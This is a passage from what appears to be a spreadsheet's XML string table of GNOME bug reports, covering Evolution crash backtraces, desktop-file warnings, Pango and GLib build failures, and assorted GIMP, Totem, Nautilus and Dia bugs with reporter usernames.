I have gstreamer 0.8.0</t>
  </si>
  <si>
    <t>EVOLUTION-585327</t>
  </si>
  <si>
    <t>Attaching a message via drag and drop doesn't work</t>
  </si>
  <si>
    <t>Evolution 2.27.3 (Group wise)
While composing a mail if i try to attach a mail via drag and drop it will attach at the moment but won't be delivered at receiver's end.
I see the warnings on terminal 
||| msgid:1243025300.4019.134.camel@pendragon
(evolution:4347): camel-groupwise-provider-WARNING **: Could not send a forwardRequest...continuing without!!
||| msgid:1243947564.4178.0.camel@calcifer</t>
  </si>
  <si>
    <t>EVOLUTION-204619</t>
  </si>
  <si>
    <t>Evolution Crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.10.99
Synopsis: Evolution Crash
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Not sure what exactly caused it but here's the chain of events.
I wrote a response to an e-mail (sign message from security was selected) and hit send.  Came back with not able to send (I'm on Yahoo and I had not authenticated recently enough to send) so I hit the send/recieve button and waited for it to complete I swaped back to the e-mail I wrote to send and got a crash message.
Debugging Information:
[New Thread 1024 (LWP 28130)]
[New Thread 2049 (LWP 28153)]
[New Thread 1026 (LWP 28154)]
[New Thread 2051 (LWP 28155)]
[New Thread 3076 (LWP 28156)]
[New Thread 6151 (LWP 28160)]
0x409e36c9 in __wait4 () from /lib/libc.so.6
#0  0x409e36c9 in __wait4 () from /lib/libc.so.6
#1  0x40a54bc0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x406a8a9e in waitpid (pid=28315 stat_loc=0xbffff32c options=0)
    at wrapsyscall.c:172
#3  0x402d5262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x08090b02 in segv_redirect (sig=11) at main.c:67
#5  0x406a66ab in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 1087159152 esi = 20 ebp = 3221223168 esp = 3221223156 ebx = 1087159312 edx = 18 ecx = 20 eax = 4294967292 trapno = 0 err = 0 eip = 1084262548 cs = 35 __csh = 0 eflags = 2097686 esp_at_signal = 3221223156 ss = 43 __ssh = 0 fpstate = 0xbffff478 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40a08894 in __poll (fds=0x40ccbb70 nfds=20 timeout=168)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x40568a74 in g_main_poll (timeout=168 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x40568465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x405687e8 in g_main_run (loop=0x812dc28) at gmain.c:935
#11 0x4047d65b in gtk_main () at gtkmain.c:524
#12 0x40792547 in bonobo_main () at bonobo-main.c:283
#13 0x08090cac in main (argc=3 argv=0xbffff99c) at main.c:140
#14 0x4094be5e in __libc_start_main (main=0x8090b2c  argc=3 
    ubp_av=0xbffff99c init=0x8062dfc  fini=0x80c02cc  
    rtld_fini=0x4000d3c4  stack_end=0xbffff994)
    at ../sysdeps/generic/libc-start.c:129
#0  0x409e36c9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40a54bc0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x406a8a9e in waitpid (pid=28315 stat_loc=0xbffff32c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff32c
options = 0
result = 0
oldtype = 0
#3  0x402d5262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1
in_segv = 1
pid = 0
#4  0x08090b02 in segv_redirect (sig=11) at main.c:67
	in main.c
sig = 11
#5  0x406a66ab in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 1087159152 esi = 20 ebp = 3221223168 esp = 3221223156 ebx = 1087159312 edx = 18 ecx = 20 eax = 4294967292 trapno = 0 err = 0 eip = 1084262548 cs = 35 __csh = 0 eflags = 2097686 esp_at_signal = 3221223156 ss = 43 __ssh = 0 fpstate = 0xbffff478 oldmask = 2147483648 cr2 = 0}) at signals.c:97
	in signals.c
self = 0x406af7c0
in_sighandler = 0x0
self = 0x406af7c0
in_sighandler = 0x0
#6  
No locals.
#7  0x40a08894 in __poll (fds=0x40ccbb70 nfds=20 timeout=168)
    at ../sysdeps/unix/sysv/linux/poll.c:63
	in ../sysdeps/unix/sysv/linux/poll.c
fds = (struct pollfd *) 0x40ccbb70
nfds = 3221222188
timeout = 0
resultvar = 1087159152
</t>
  </si>
  <si>
    <t>amwranes</t>
  </si>
  <si>
    <t>LIBRSVG-137275</t>
  </si>
  <si>
    <t>4 new nuvola icons from David which misrenders</t>
  </si>
  <si>
    <t>David sent me this file which contain some misrendering icons including
jpeg images of the correct rendering and some explanations.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-129207</t>
  </si>
  <si>
    <t>gnome-volume-control.desktop file doesn't follow standard</t>
  </si>
  <si>
    <t>gnome-volume-control.desktop file doesn't follow freedesktop.org's
standard. Here is a patch which fixes it.</t>
  </si>
  <si>
    <t>grzegol</t>
  </si>
  <si>
    <t>YELP-500483</t>
  </si>
  <si>
    <t>Please fix yelp.desktop file</t>
  </si>
  <si>
    <t>Please describe the problem:
$ desktop-file-validate /usr/share/applications/yelp.desktop
/usr/share/applications/yelp.desktop: warning: key Encoding in group Desktop Entry is deprecated
/usr/share/applications/yelp.desktop: warning: value GNOMEGTKApplicationCore for key Categories in group Desktop Entry contains a deprecated value Application
Steps to reproduce:
Just run at console: $ desktop-file-validate /usr/share/applications/yelp.desktop
Actual results:
Give me two warnings about deprecated stuff..
Expected results:
No warnings found...
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>gothicx</t>
  </si>
  <si>
    <t>GNOME-SCHEDULE-325879</t>
  </si>
  <si>
    <t>GNOME-SCHEDULE</t>
  </si>
  <si>
    <t>Icon selector not using the standard gnome icon selector</t>
  </si>
  <si>
    <t>Daniele Medri :
- if you click on the button to choice your icon didn't appear to the
right place (e.g. /usr/share/icon) or without the classic gnome dialog
to select icon</t>
  </si>
  <si>
    <t>gnome-schedule-maint</t>
  </si>
  <si>
    <t>eg</t>
  </si>
  <si>
    <t>DAMNED-LIES-461105</t>
  </si>
  <si>
    <t>step 6 from INSTALL isn't necessary anymore</t>
  </si>
  <si>
    <t>Please describe the problem:
in that step says:
 6. Look at DAMNED_DIR/data/main.css replacing any /~danilo/damned-lies/ paths with your own (defaults.webroot)
but that isn't necessary anymore because there isn't any reference to /~danilo/damned-lies/ in that file
attaching a patch to remove those lines and updating the indexes
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-324370</t>
  </si>
  <si>
    <t>boogle</t>
  </si>
  <si>
    <t>improve browse.cgi</t>
  </si>
  <si>
    <t>Other information:</t>
  </si>
  <si>
    <t>LIBEGG-304679</t>
  </si>
  <si>
    <t>tray</t>
  </si>
  <si>
    <t>EggStatusIcon unimplemented functions</t>
  </si>
  <si>
    <t>egg_status_icon_set_from_file() and egg_status_icon_set_from_stock() aren't
implemented at all.</t>
  </si>
  <si>
    <t>libegg-maint</t>
  </si>
  <si>
    <t>EVOLUTION-200569</t>
  </si>
  <si>
    <t>Changing an empty folder into mbox mangle it.</t>
  </si>
  <si>
    <t>Follow steps to cook bug:
1/ create a new folder or use Inbox from a scratch install
2/ select Configure Folder from the Folder menu
3/ Change folder type from MH to mbox
4/ now try to move a message from another folder to this one and...
Error while moving messages from  into  
Cannot append message to mbox file: No such file or directory.
Have a nice day
Federico</t>
  </si>
  <si>
    <t>fog</t>
  </si>
  <si>
    <t>EVOLUTION-216947</t>
  </si>
  <si>
    <t>Crash: Trouble Setting up a new mail account</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0
Synopsis: Trouble Setting up a new mail account
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Start Evolution with no mail accounts specified and it runs through the
add mail account wizard. At the end of the wizard it crashed. 
I have been having trouble with evolution recently possibly because my
/var partition became full.  
Evolution kept getting 'stuck' resynchronising with my mail servers
*IMAP) however there was no network utilisation from evolution and it
would not close down properly. 
I tried removing the mail accounts and then reentering them to clear the
problem and this worked once. On the second attempt the wizard crashed.
I have cleared out my /var partition and this problem is still arising. 
I haven't seen it with the previous version of evolution
(0.99.2-ximian).
Debugging Information:
(no debugging symbols found)...[New Thread 1024 (LWP 2108)]
[New Thread 2049 (LWP 2129)]
[New Thread 1026 (LWP 2130)]
[New Thread 2051 (LWP 2131)]
[New Thread 3076 (LWP 2134)]
[New Thread 4101 (LWP 2135)]
0x40b6ac09 in __wait4 () from /lib/libc.so.6
#0  0x40b6ac09 in __wait4 () from /lib/libc.so.6
#1  0x40be6fd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x401fa8de in waitpid (pid=2164 stat_loc=0xbfffed7c options=0)
    at wrapsyscall.c:172
#3  0x406f8262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x0809cdb9 in message_browser_get_type () at eval.c:41
#5  0x401f84c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 esi = 136482008 ebp = 3221221720 esp = 3221221696 ebx = 1074345160 edx = 1075854496 ecx = 1 eax = 0 trapno = 14 err = 4 eip = 1074126812 cs = 35 __csh = 0 eflags = 2163202 esp_at_signal = 3221221696 ss = 43 __ssh = 0 fpstate = 0xbfffeec0 oldmask = 2147483648 cr2 = 12}) at signals.c:97
#6  
#7  camel_operation_unref (cc=0x0) at camel-operation.c:175
#8  0x400695f5 in camel_service_connect (service=0x8228cd8 ex=0xbffff1f0)
    at camel-service.c:265
#9  0x4006ac08 in camel_session_get_service_connected (session=0x813d038 
    url_string=0x8229698 imap://mg8015@student-imap-srv.bristol.ac.uk/use_lsubcheck_all type=CAMEL_PROVIDER_STORE ex=0xbffff1f0) at camel-session.c:508
#10 0x08099ff9 in mail_tool_get_inbox () at eval.c:41
#11 0x0808343c in mail_config_get_accounts () at eval.c:41
#12 0x0807b34e in mail_account_gui_save () at eval.c:41
#13 0x080852c7 in mail_config_druid_new () at eval.c:41
#14 0x40948f5d in gtk_marshal_NONE__INT (object=0x8150a28 
    func=0x80852b4  func_data=0x8150f08 
    args=0xbffff350) at gtkmarshal.c:240
#15 0x40978706 in gtk_handlers_run (handlers=0x80fab20 signal=0xbffff2f0 
    object=0x8150a28 params=0xbffff350 after=0) at gtksignal.c:1917
#16 0x40977b57 in gtk_signal_real_emit (object=0x8150a28 signal_id=37 
    params=0xbffff350) at gtksignal.c:1477
#17 0x40975bcc in gtk_signal_emit (object=0x8150a28 signal_id=37)
    at gtksignal.c:552
#18 0x403381d0 in impl_GNOME_Evolution_Wizard_notifyAction (servant=0x8150a84 
    pagenumber=0 action=GNOME_Evolution_Wizard_FINISH ev=0xbffff680)
    at evolution-wizard.c:136
#19 0x4032079c in _ORBIT_skel_GNOME_Evolution_Wizard_notifyAction (
    _ORBIT_servant=0x8150a84 _ORBIT_recv_buffer=0x812e108 ev=0xbffff680 
    _impl_notifyAction=0x403380d8 )
    at Evolution-skels.c:6624
#20 0x40a6d210 in ORBit_POA_handle_request (recv_buffer=0x812e108 
    poa=0x81017a8) at orbit_poa.c:513
#21 0x40a6f47a in ORBit_handle_incoming_request (recv_buffer=0x812e108)
    at server.c:90
#22 0x40a6f6a1 in ORBit_handle_incoming_message (recv_buffer=0x812e108)
    at server.c:160
#23 0x40a85ce4 in giop_main_handle_connection (connection=0x8130370)
    at connection.c:1214
#24 0x40a2eb01 in orb_handle_connection (source=0x8118000 cond=G_IO_IN 
    cnx=0x8130370) at oaf-mainloop.c:70
#25 0x40aa3a7a in g_io_unix_dispatch (source_data=0x8118018 
    current_time=0xbffff810 user_data=0x8130370) at giounix.c:137
#26 0x40aa5055 in g_main_dispatch (dispatch_time=0xbffff810) at gmain.c:656
#27 0x40aa5659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#28 0x40aa57e8 in g_main_run (loop=0x81018a8) at gmain.c:935
#29 0x409477f7 in gtk_main () at gtkmain.c:524
#30 0x4059f65f in bonobo_main () at bonobo-main.c:283
#31 0x0809cfcd in main () at eval.c:41
#32 0x40ad3306 in __libc_start_main (main=0x809ce04  argc=3 
    ubp_av=0xbffffa3c init=0x8065f70  fini=0x80d27b0  
    rtld_fini=0x4000d2cc  stack_end=0xbffffa2c)
    at ../sysdeps/generic/libc-start.c:129
Thread 6 (Thread 4101 (LWP 2135)):
#0  0x40ae5966 in __sigsuspend (set=0xbf1ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401f7d61 in __pthread_wait_for_restart_signal (self=0xbf1ffc00)
    at pthread.c:969
#2  0x401f3ee4 in pthread_cond_wait (cond=0x812e900 mutex=0x812e8e0)
    at restart.h:34
#3  0x4007e216 in e_msgport_wait (mp=0x812e8b8) at e-msgport.c:198
#4  0x4007e83e in thread_dispatch (din=0x812e868) at e-msgport.c:517
#5  0x401f4f87 in pthread_start_thread (arg=0xbf1ffc00) at manager.c:284
Thread 5 (Thread 3076 (LWP 2134)):
#0  0x40ae5966 in __sigsuspend (set=0xbf3ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401f7d61 in __pthread_wait_for_restart_signal (self=0xbf3ffc00)
    at pthread.c:969
#2  0x401f3ee4 in pthread_cond_wait (cond=0x812e900 mutex=0x812e8e0)
    at restart.h:34
#3  0x4007e216 in e_msgport_wait (mp=0x812e8b8) at e-msgport.c:198
#4  0x4007e83e in thread_dispatch (din=0x812e868) at e-msgport.c:517
#5  0x401f4f87 in pthread_start_thread (arg=0xbf3ffc00) at manager.c:284
Thread 4 (Thread 2051 (LWP 2131)):
#0  0x40ae5966 in __sigsuspend (set=0xbf5ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401f7d61 in __pthread_wait_for_restart_signal (self=0xbf5ffc00)
    at pthread.c:969
#2  0x401f3ee4 in pthread_cond_wait (cond=0x812e858 mutex=0x812e838)
    at restart.h:34
#3  0x4007e216 in e_msgport_wait (mp=0x812e810) at e-msgport.c:198
#4  0x4007e83e in thread_dispatch (din=0x812e7c0) at e-msgport.c:517
#5  0x401f4f87 in pthread_start_thread (arg=0xbf5ffc00) at manager.c:284
Thread 3 (Thread 1026 (LWP 2130)):
#0  0x40ae5966 in __sigsuspend (set=0xbf7ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401f7d61 in __pthread_wait_for_restart_signal (self=0xbf7ffc00)
    at pthread.c:969
#2  0x401f3ee4 in pthread_cond_wait (cond=0x812e7b0 mutex=0x812e790)
    at restart.h:34
#3  0x4007e216 in e_msgport_wait (mp=0x812e768) at e-msgport.c:198
#4  0x4007e83e in thread_dispatch (din=0x812e718) at e-msgport.c:517
#5  0x401f4f87 in pthread_start_thread (arg=0xbf7ffc00) at manager.c:284
Thread 2 (Thread 2049 (LWP 2129)):
#0  0x40b95bec in __poll (fds=0x81483bc nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x401f4d0e in __pthread_manager (arg=0x1b) at manager.c:140
Thread 1 (Thread 1024 (LWP 2108)):
#0  0x40b6ac09 in __wait4 () from /lib/libc.so.6
#1  0x40be6fd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x401fa8de in waitpid (pid=2164 stat_loc=0xbfffed7c options=0)
    at wrapsyscall.c:172
#3  0x406f8262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x0809cdb9 in message_browser_get_type () at eval.c:41
#5  0x401f84c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 esi = 136482008 ebp = 3221221720 esp = 3221221696 ebx = 1074345160 edx = 1075854496 ecx = 1 eax = 0 trapno = 14 err = 4 eip = 1074126812 cs = 35 __csh = 0 eflags = 2163202 esp_at_signal = 3221221696 ss = 43 __ssh = 0 fpstate = 0xbfffeec0 oldmask = 2147483648 cr2 = 12}) at signals.c:97
#6  
#7  camel_operation_unref (cc=0x0) at camel-operation.c:175
#8  0x400695f5 in camel_service_connect (service=0x8228cd8 ex=0xbffff1f0)
    at camel-service.c:265
#9  0x4006ac08 in camel_session_get_service_connected (session=0x813d038 
    url_string=0x8229698 imap://mg8015@student-imap-srv.bristol.ac.uk/use_lsubcheck_all type=CAMEL_PROVIDER_STORE ex=0xbffff1f0) at camel-session.c:508
#10 0x08099ff9 in mail_tool_get_inbox () at eval.c:41
#11 0x0808343c in mail_config_get_accounts () at eval.c:41
#12 0x0807b34e in mail_account_gui_save () at eval.c:41
#13 0x080852c7 in mail_config_druid_new () at eval.c:41
#14 0x40948f5d in gtk_marshal_NONE__INT (object=0x8150a28 
    func=0x80852b4  func_data=0x8150f08 
    args=0xbffff350) at gtkmarshal.c:240
#15 0x40978706 in gtk_handlers_run (handlers=0x80fab20 signal=0xbffff2f0 
    object=0x8150a28 params=0xbffff350 after=0) at gtksignal.c:1917
#16 0x40977b57 in gtk_signal_real_emit (object=0x8150a28 signal_id=37 
    params=0xbffff350) at gtksignal.c:1477
#17 0x40975bcc in gtk_signal_emit (object=0x8150a28 signal_id=37)
    at gtksignal.c:552
#18 0x403381d0 in impl_GNOME_Evolution_Wizard_notifyAction (servant=0x8150a84 
    pagenumber=0 action=GNOME_Evolution_Wizard_FINISH ev=0xbffff680)
    at evolution-wizard.c:136
#19 0x4032079c in _ORBIT_skel_GNOME_Evolution_Wizard_notifyAction (
    _ORBIT_servant=0x8150a84 _ORBIT_recv_buffer=0x812e108 ev=0xbffff680 
    _impl_notifyAction=0x403380d8 )
    at Evolution-skels.c:6624
#20 0x40a6d210 in ORBit_POA_handle_request (recv_buffer=0x812e108 
    poa=0x81017a8) at orbit_poa.c:513
#21 0x40a6f47a in ORBit_handle_incoming_request (recv_buffer=0x812e108)
    at server.c:90
#22 0x40a6f6a1 in ORBit_handle_incoming_message (recv_buffer=0x812e108)
    at server.c:160
#23 0x40a85ce4 in giop_main_handle_connection (connection=0x8130370)
    at connection.c:1214
#24 0x40a2eb01 in orb_handle_connection (source=0x8118000 cond=G_IO_IN 
    cnx=0x8130370) at oaf-mainloop.c:70
#25 0x40aa3a7a in g_io_unix_dispatch (source_data=0x8118018 
    current_time=0xbffff810 user_data=0x8130370) at giounix.c:137
#26 0x40aa5055 in g_main_dispatch (dispatch_time=0xbffff810) at gmain.c:656
#27 0x40aa5659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#28 0x40aa57e8 in g_main_run (loop=0x81018a8) at gmain.c:935
#29 0x409477f7 in gtk_main () at gtkmain.c:524
#30 0x4059f65f in bonobo_main () at bonobo-main.c:283
#31 0x0809cfcd in main () at eval.c:41
#32 0x40ad3306 in __libc_start_main (main=0x809ce04  argc=3 
    ubp_av=0xbffffa3c init=0x8065f70  fini=0x80d27b0  
    rtld_fini=0x4000d2cc  stack_end=0xbffffa2c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40b6ac09 in __wait4 () from /lib/libc.so.6
#0  0x40b6ac09 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40be6fd0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x401fa8de in waitpid (pid=2164 stat_loc=0xbfffed7c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffed7c
options = 0
result = 0
oldtype = 0
#3  0x406f8262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1075812154
in_segv = 1
pid = 0
#4  0x0809cdb9 in message_browser_get_type () at eval.c:41
	in eval.c
ap = (void **) 0xbfffeec0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
result = 3221221056
result = 3221221056
value = (void *) 0xbfffed7c
#5  0x401f84c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 esi = 136482008 ebp = 3221221720 esp = 3221221696 ebx = 1074345160 edx = 1075854496 ecx = 1 eax = 0 trapno = 14 err = 4 eip = 1074126812 cs = 35 __csh = 0 eflags = 2163202 esp_at_signal = 3221221696 ss = 43 __ssh = 0 fpstate = 0xbfffeec0 oldmask = 2147483648 cr2 = 12}) at signals.c:97
	in signals.c
self = 0x40201460
in_sighandler = 0x0
self = 0x40201460
in_sighandler = 0x0
#6  
No locals.
#7  camel_operation_unref (cc=0x0) at camel-operation.c:175
	in camel-operation.c
cc = (CamelOperation *) 0x0
n = (GSList *) 0x8228cd8
Unknown reporter: mg8015@bristol.ac.uk changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>mg8015</t>
  </si>
  <si>
    <t>F-SPOT-378263</t>
  </si>
  <si>
    <t>--uninstalled option no longer works when testing cvs</t>
  </si>
  <si>
    <t>Please describe the problem:
The f-spot script in the source database checks for the --uninstalled switch to run the local f-spot instance.  This no longer works with thenew  Mono.GetOptions stuff
Steps to reproduce:
launch f-spot from the src directory with the --uninstalled switch
Actual results:
terminal prints Unknown option --uninstalled
Expected results:
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>thomas.vanmachelen</t>
  </si>
  <si>
    <t>TOTEM-354089</t>
  </si>
  <si>
    <t>Totem can't play MPEG2 file</t>
  </si>
  <si>
    <t>Please describe the problem:
Totem doesn't play the latest tv spot from ad campaign of one of Polish parties (Platforma Obywatelska). The spot is available at:
http://www.platforma.org/_files_/multimedia/wideoklipy/spot_samorzadowy/po_spot_2006.mpg
Steps to reproduce:
1. Download http://www.platforma.org/_files_/multimedia/wideoklipy/spot_samorzadowy/po_spot_2006.mpg
2. Run totem po_spot_2006.mpg
Actual results:
Totem displays valid length of the spot (24 seconds) but it stops playing immediately (no display no sound).
Expected results:
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>zbigniew.chyla</t>
  </si>
  <si>
    <t>GEDIT-131668</t>
  </si>
  <si>
    <t>default encoding saving for new file</t>
  </si>
  <si>
    <t>Follow-up of Mdk bug http://qa.mandrakesoft.com/show_bug.cgi?id=6887 :
default value of /apps/gedit-2/preferences/editor/save/save_encoding is
GEDIT_SAVE_ALWAYS_UTF8.
On system with non-UTF8 locale this is causing new file created in gedit
to be UTF-8. I'm not sure it is very wise (and if UTF-8 is THE way to go..)</t>
  </si>
  <si>
    <t>GLIB-360296</t>
  </si>
  <si>
    <t>Thinko breaks gtimer.c build on SunOS 5.9 (patch)</t>
  </si>
  <si>
    <t>On my SunOS 5.9 machine building GLib fails in gtimer.c. The problem is that on this machine HAVE_CLOCK_GETTIME is defined but HAVE_MONOTONIC_CLOCK isn't and there is a preprocessor directive #elif HAVE_CLOCK_GETTIME when it should be #elif USE_CLOCK_GETTIME. (The latter is a macro defined in the file.
Simple patch to fix is attached. I can commit to CVS if it's OK.</t>
  </si>
  <si>
    <t>GIMP-125101</t>
  </si>
  <si>
    <t>Divide layer mode makes everything green</t>
  </si>
  <si>
    <t>I loaded some old images and to my surprise they were all tinted greenish.
I noticed that each had a gray layer that was set to divide-mode. And it
was acting weird.
Setting GIMP_COMPOSITE=0x0 made it work correctly though so the bug seems
to lie in the composition stuff.
So: in current CVS with the new composition stuff Divide layer mode is
broken.</t>
  </si>
  <si>
    <t>NAUTILUS-132959</t>
  </si>
  <si>
    <t>non-ascii window title must unescaped.</t>
  </si>
  <si>
    <t>when browsing non-local location and location has non-ascii string window
title shows escaped strings.
i'll submit patch.</t>
  </si>
  <si>
    <t>FILE-ROLLER-160930</t>
  </si>
  <si>
    <t>Unable to extract files</t>
  </si>
  <si>
    <t>- Run file-roller
- Open any existing tar.gz archive
- Click on 'Extract'
- Select a directory to extract &amp; click on 'Extract'
Files are not extracted.</t>
  </si>
  <si>
    <t>EVOLUTION-203772</t>
  </si>
  <si>
    <t>Unsupported auth should be grayed out not hidden</t>
  </si>
  <si>
    <t>In the mail configuration dialog you have an option menu where you can
select the authentication method and a detect supported types button to
check for the available methods.  When you choose to detect the
unsupported types just disappear from the option menu.
I think it would be nicer if they were just grayed out instead.</t>
  </si>
  <si>
    <t>GNOME-PANEL-135840</t>
  </si>
  <si>
    <t>menubar actions log out tooltip shows unkonwn instead of username</t>
  </si>
  <si>
    <t>The Log Out Tooltip in the Actions menu of panel shows Log Out unknown
where the expected result is it should show Log Out from Username's desktop</t>
  </si>
  <si>
    <t>dharma_kit</t>
  </si>
  <si>
    <t>DIA-142524</t>
  </si>
  <si>
    <t>Printing landscape A3 sized document outputs partially in A4 portrait</t>
  </si>
  <si>
    <t>I have set up an A3 sized document in landscape mode. 
My postscript viewers (kghostscript and gv) shows the complete document 
but the paper size A3 is not automatically choosen and the displayed 
orientation is still portrait. 
When printing the document it's output is always on A4 tray not the A3 tray 
whereas the document is scaled (correctly) to A3. Thus only a upper left part 
of the document is printed. 
Nearby: printing with mozilla and StarOffice choose the correct tray and output 
format. Thus the printer is set up well. The printer is managed with CUPS. 
-- System Information: 
Debian Release: testing/unstable 
  APT prefers testing 
  APT policy: (600 'testing') (50 'unstable') 
Architecture: i386 (i686) 
Kernel: Linux 2.6.5-1-686 
Locale: LANG=de_DE LC_CTYPE=de_DE 
Versions of packages dia-gnome depends on: 
ii  dia-common                0.92.2-5       Diagram editor (common files) 
ii  dia-libs                  0.92.2-5       Diagram editor (library files) 
ii  libart-2.0-2              2.3.16-3       Library of functions for 2D graphi 
ii  libatk1.0-0               1.4.1-1        The ATK accessibility toolkit 
ii  libaudiofile0             0.2.6-3        Open-source version of SGI's audio 
ii  libbonobo2-0              2.4.3-1        Bonobo CORBA interfaces library 
ii  libbonoboui2-0            2.4.3-2        The Bonobo UI library 
ii  libc6                     2.3.2.ds1-12   GNU C Library: Shared libraries an 
ii  libesd-alsa0 [libesd0]    0.2.29-1       Enlightened Sound Daemon (ALSA) -  
ii  libfreetype6              2.1.7-2        FreeType 2 font engine shared lib 
ii  libgconf2-4               2.4.0.1-4      GNOME configuration database syste 
ii  libgcrypt1                1.1.12-4       LGPL Crypto library - runtime libr 
ii  libglib2.0-0              2.2.3-1        The GLib library of C routines 
ii  libgnome2-0               2.4.0-11       The GNOME 2 library - runtime file 
ii  libgnomecanvas2-0         2.4.0-3        A powerful object-oriented display 
ii  libgnomeui-0              2.4.0.1-12     The GNOME 2 libraries (User Interf 
ii  libgnomevfs2-0            2.4.1-5        The GNOME virtual file-system libr 
ii  libgnomevfs2-common       2.4.1-5        The GNOME virtual file-system libr 
ii  libgnutls7                0.8.12-5       GNU TLS library - runtime library 
ii  libgtk2.0-0               2.2.4-3        The GTK+ graphical user interface  
ii  libice6                   4.3.0.dfsg.1-1 Inter-Client Exchange library 
ii  libjpeg62                 6b-9           The Independent JPEG Group's JPEG  
ii  liborbit2                 1:2.8.3-2      libraries for ORBit2 - a CORBA ORB 
ii  libpango1.0-0             1.2.5-4        Layout and rendering of internatio 
ii  libpng12-0                1.2.5.0-6      PNG library - runtime 
ii  libpopt0                  1.7-4          lib for parsing cmdline parameters 
ii  libsm6                    4.3.0.dfsg.1-1 X Window System Session Management 
ii  libtasn1-0                0.1.2-1        Manage ASN.1 structures (runtime) 
ii  libx11-6                  4.3.0.dfsg.1-1 X Window System protocol client li 
ii  libxml2                   2.6.9-2        GNOME XML library 
ii  xlibs                     4.3.0.dfsg.1-1 X Window System client libraries m 
ii  zlib1g                    1:1.2.1-5      compression library - runtime</t>
  </si>
  <si>
    <t>reiner.nix</t>
  </si>
  <si>
    <t>PANGO-74880</t>
  </si>
  <si>
    <t>Build Broken: undefined references during build</t>
  </si>
  <si>
    <t>I have just completed a complete rebuild of my system as laid out at the 
linux from scratch web site: http://lfs.planetmirror.com/lfs/intro.shtml 
(one of the best sites for its kind on the web).  I tweaked my install 
slightly by obtaining newer versions of some of the packages (I'll tag the 
complete list to the end).  Pongo crashes during the build process.  Since 
I'm using all GNU software from scratch (I compiled it all myself using 
glibc2.2.5 and gcc3.0.4) this is likely to be a bug in Pongo.
You Aint gonna get more gnu then that...
Pongo-1.0.0 and CVS -A version:
Problem Description:  Building pongo results in undefined references during
the build.
Reproduce:
1.  install packages as shown in appendix (this includes all of the 
required libs as shown on the http://www.gtk.org pages)
2.  ./configure
3.  make
Result:
gcc -shared  break.lo fonts.lo glyphstring.lo mapping.lo modules.lo
pango-attributes.lo pango-color.lo pango-context.lo pango-coverage.lo
pango-fontmap.lo pango-fontset.lo pango-intset.lo pango-item.lo
pango-layout.lo pango-markup.lo pango-tabs.lo pango-utils.lo
reorder-items.lo shape.lo pango-enum-types.lo -Wl--whole-archive
mini-fribidi/.libs/libmini-fribidi.al -Wl--no-whole-archive  -Wl--rpath
-Wl/usr/local/lib -Wl--rpath -Wl/usr/local/lib  -L/usr/local/lib
/usr/local/lib/libgobject-2.0.so /usr/local/lib/libgmodule-2.0.so -ldl
/usr/local/lib/libglib-2.0.so mini-fribidi/.libs/libmini-fribidi.al
-Wl--export-dynamic -Wl-soname -Wllibpango-1.0.so.0 -o
.libs/libpango-1.0.so.0.0.0
(cd .libs &amp;&amp; rm -f libpango-1.0.so.0 &amp;&amp; ln -s libpango-1.0.so.0.0.0
libpango-1.0.so.0)
(cd .libs &amp;&amp; rm -f libpango-1.0.so &amp;&amp; ln -s libpango-1.0.so.0.0.0
libpango-1.0.so)
creating libpango-1.0.la
